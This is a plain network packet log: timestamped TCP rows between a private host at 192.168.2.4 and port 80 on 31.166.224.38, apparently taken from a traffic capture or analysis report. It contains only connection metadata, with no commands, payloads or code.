Oct 29, 2021 20:50:45.603372097 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.603400946 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.603425980 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.603450060 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.603667974 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.603709936 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.603977919 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.604012012 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.604034901 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.604049921 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.604059935 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.604093075 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.604361057 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.604387045 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.604410887 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.604434013 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.604434967 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.604470968 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.604731083 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.604907990 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.604934931 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.604962111 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.604965925 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.605000019 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.605102062 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.605127096 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.605161905 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.605354071 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.605380058 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.605418921 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.605421066 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.605731010 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.605757952 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.605782032 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.606054068 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.606081009 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.606097937 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.606401920 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.606430054 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.606452942 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.606455088 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.606492043 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.606668949 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.606688976 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.606734037 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.629156113 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.629322052 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.629349947 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.629374027 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.629385948 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.629398108 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.629415035 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.629547119 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.629569054 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.629595995 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.668639898 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.668670893 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.668715000 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.668715000 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.668734074 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.668751001 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.668761969 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.668806076 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.668925047 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.669209957 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.669230938 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.669264078 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.669791937 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.669814110 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.669831991 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.669869900 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.669898033 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.670062065 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.670080900 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.670097113 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.670113087 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.670151949 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.670160055 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.670193911 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.670841932 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.670864105 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.670905113 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.671153069 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.671173096 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.671189070 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.671205997 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.671214104 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.671217918 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.671232939 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.671266079 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.671521902 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.671538115 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.671554089 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.671572924 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.671602964 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.671632051 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.672101974 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.672394037 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.672409058 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.672430992 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.672449112 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.672466040 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.672476053 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.672492981 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.672508955 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.672830105 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.672874928 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.672889948 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.672898054 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.672960997 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.691492081 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.691829920 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.691909075 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.691970110 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.691991091 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.692035913 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.692456961 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.695951939 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.695971966 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.695987940 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.696012020 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.696027040 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.696049929 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.696110010 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.696130991 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.696161032 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.696619987 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.696732998 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.735970974 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.736036062 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.736074924 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.736149073 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.736162901 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.736203909 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.736217976 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.736241102 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.736299992 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.736545086 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.736591101 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.736645937 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.736712933 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.736938000 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.736987114 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.736993074 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.737250090 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.737303019 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.737304926 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.737359047 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.737405062 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.737409115 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.737442017 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.737490892 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.737807035 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.737848043 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.737884045 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.737900972 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.737935066 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.737982988 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.739068985 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.739114046 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.739156008 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.739171028 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.740042925 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.740077019 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.740118980 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.755819082 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.755892038 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.755917072 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.755949974 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.756006956 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.756011963 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.756066084 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.756125927 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.756431103 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.756515980 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.756555080 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.756594896 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.756596088 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.756637096 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.756665945 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.756696939 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.756742954 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.756747007 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.756783962 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.756839991 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.756899118 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.757299900 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.757347107 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.757376909 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.762711048 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.762753963 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.762794018 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.762871027 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.762912035 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.762914896 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.762957096 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.763000011 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.763021946 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.763196945 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.763278008 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.802717924 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.802776098 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.802846909 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.802869081 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.802967072 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.803014994 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.803076982 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.803170919 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.803225040 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.803257942 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.803296089 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.803347111 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.803518057 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.803556919 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.803605080 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.803651094 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.804162979 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.804203033 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.804215908 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.804395914 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.804436922 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.804445982 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.804490089 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.804538012 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.804538965 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.804582119 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.804617882 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.804627895 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.804941893 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.804997921 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.805152893 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.805188894 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.805227041 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.805232048 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.805263042 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.805294037 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.805308104 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.805469990 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.805506945 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.805562019 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.805824041 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.805875063 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.842722893 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.842756033 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.842827082 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.843147039 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.843175888 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.843200922 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.843226910 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.843230009 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.843274117 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.843310118 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.843470097 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.843549967 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.843584061 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.843631983 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.843658924 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.843753099 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.843961000 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.843980074 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.844021082 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.844153881 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.844180107 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.844259977 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.844341040 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.844358921 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.844398975 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.844538927 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.844557047 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.844594002 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.869714022 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.869750977 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.869779110 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.869858027 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.869884968 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.869967937 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.869999886 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.870028973 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.870059967 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.870076895 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.870124102 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.870713949 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.870742083 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.870769978 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.870791912 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.870798111 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.870850086 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.871028900 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.871057034 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.871129036 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.871177912 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.871206999 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.871234894 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.871253967 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.871587992 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.871615887 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.871642113 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.871651888 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.871701002 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.871704102 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.872159004 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.872185946 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.872215033 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.872224092 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.872258902 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.872735977 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.872759104 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.872786045 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.872813940 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.872823000 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.872872114 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.872925997 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.892918110 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.893038988 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.893064976 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.893105984 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.893193960 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.893218040 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.893234968 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.893273115 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.893285036 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.893312931 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.893352032 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.893353939 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.893381119 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.893419981 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.910358906 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.910422087 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.910461903 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.910505056 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.910577059 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.910619974 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.910655022 CEST	49867	80	192.168.2.4	31.166.224.38
